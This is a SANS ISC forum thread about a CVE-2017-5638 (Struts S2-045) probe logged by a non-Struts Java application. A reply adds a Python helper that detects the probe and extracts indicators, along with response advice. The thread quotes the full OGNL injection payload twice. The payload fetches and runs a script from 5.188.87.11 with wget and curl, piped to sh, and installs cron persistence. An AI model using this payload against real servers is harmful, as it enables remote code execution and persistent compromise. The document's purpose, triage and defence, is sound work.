
SANS ISC InfoSec Forums: CVE-2017-5638 probe


CVE-2017-5638 probe
I have a locally written Java application that I maintain which is being hit by CVE-2017-5638 probes. It does not use Struts, but the probes happen to trigger an internal consistency check, so I get an email each time.

It's at quite a low rate (I see about one a day across a number of instances); for example, this morning's was:

Date: 05-Oct-2017 08:30:14
IP Address: 5.188.10.250
Headers:
host = **removed**
, connection = 'keep-alive'
, accept-encoding = 'gzip, deflate'
, accept = '*/*'
, user-agent = 'Mozilla/5.0'
, content-type = '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'


Clearly there is some kind of payload or C&C at http://5.188.87.11/icons/logo.jpg (I've not looked).
What's the correct response when you start seeing something like this?
Anonymous
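As an added example (not code from the post above, nor from SANS ISC), here is a small Python triage helper for exactly this class of probe: it recognises the OGNL expression that CVE-2017-5638 (Struts 2 advisory S2-045) lets the Jakarta multipart parser evaluate from the Content-Type header, then pulls out the embedded command, the URLs it would fetch and whether it tries to persist via cron, so the indicators can be blocked and shared without anyone fetching logo.jpg. It assumes request headers arrive as a dict with lower-case keys like the ones quoted in the post; the probe header is the one from the post re-joined onto a single line, the benign request and the 192.0.2.10 client address are constructed for the example.

```python
"""Triage helper for CVE-2017-5638 style probes (added example, not from the post)."""
import re
from urllib.parse import urlparse

# Strings that only appear in OGNL injection attempts and never in a legitimate
# Content-Type value. Any one of them is enough to flag the request.
OGNL_MARKERS = (
    "%{",
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "java.lang.ProcessBuilder",
    "ServletActionContext",
)

URL_RE = re.compile(r"https?://[^\s\"'|]+")
# The command string the probe hands to ProcessBuilder: #cmd='...'
CMD_RE = re.compile(r"#cmd='((?:[^'\\]|\\.)*)'")


def is_ognl_probe(content_type: str) -> bool:
    """True when the Content-Type header carries an OGNL expression."""
    return any(marker in content_type for marker in OGNL_MARKERS)


def extract_iocs(content_type: str) -> dict:
    """Pull the shell command, payload URLs and hosts out of the header."""
    m = CMD_RE.search(content_type)
    command = m.group(1) if m else ""
    urls = []
    for url in URL_RE.findall(content_type):
        if url not in urls:          # dedupe, keep first-seen order
            urls.append(url)
    hosts = []
    for url in urls:
        h = urlparse(url).hostname
        if h and h not in hosts:
            hosts.append(h)
    return {
        "command": command,
        "urls": urls,
        "hosts": hosts,
        # "| crontab -" replaces the user's crontab: persistence, not a one-off fetch
        "persistence": "crontab" in command,
    }


def triage(headers: dict, source_ip: str) -> dict:
    """Verdict for one request; headers is a dict with lower-case keys (assumption)."""
    ct = headers.get("content-type", "")
    if not is_ognl_probe(ct):
        return {"source_ip": source_ip, "probe": False}
    return {"source_ip": source_ip, "probe": True, **extract_iocs(ct)}


# Sample input: the probe quoted in the post, joined back onto one line.
PAYLOAD = (
    r"""%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"""
    r""".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"""
    r""".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"""
    r""".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())"""
    r""".(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n"""
    r"""*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh')"""
    r""".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"""
    r""".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))"""
    r""".(#p.redirectErrorStream(true)).(#process=#p.start())"""
    r""".(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"""
    r""".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"""
)
PROBE_HEADERS = {
    "host": "example.invalid",
    "connection": "keep-alive",
    "accept-encoding": "gzip, deflate",
    "accept": "*/*",
    "user-agent": "Mozilla/5.0",
    "content-type": PAYLOAD,
}
# Constructed benign upload for comparison (must not be flagged).
BENIGN_HEADERS = {
    "host": "example.invalid",
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryabc123",
}

if __name__ == "__main__":
    # 192.0.2.10 is a documentation address used here as a placeholder client.
    for ip, hdrs in (("5.188.10.250", PROBE_HEADERS), ("192.0.2.10", BENIGN_HEADERS)):
        print(triage(hdrs, ip))
```

On the poster's question: an application that never hands Content-Type to the Struts 2 multipart parser does not evaluate the expression, so on these hosts the probe is noise rather than an incident, and the useful response is to confirm that no Struts 2 build in the affected ranges named in S2-045 (2.3.5 to 2.3.31 and 2.5 to 2.5.10) is present anywhere behind the same perimeter, block or rate-limit the source and payload hosts the helper extracts, and check crontab on any host that was running a vulnerable version, since the command above is the only thing that would have executed.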
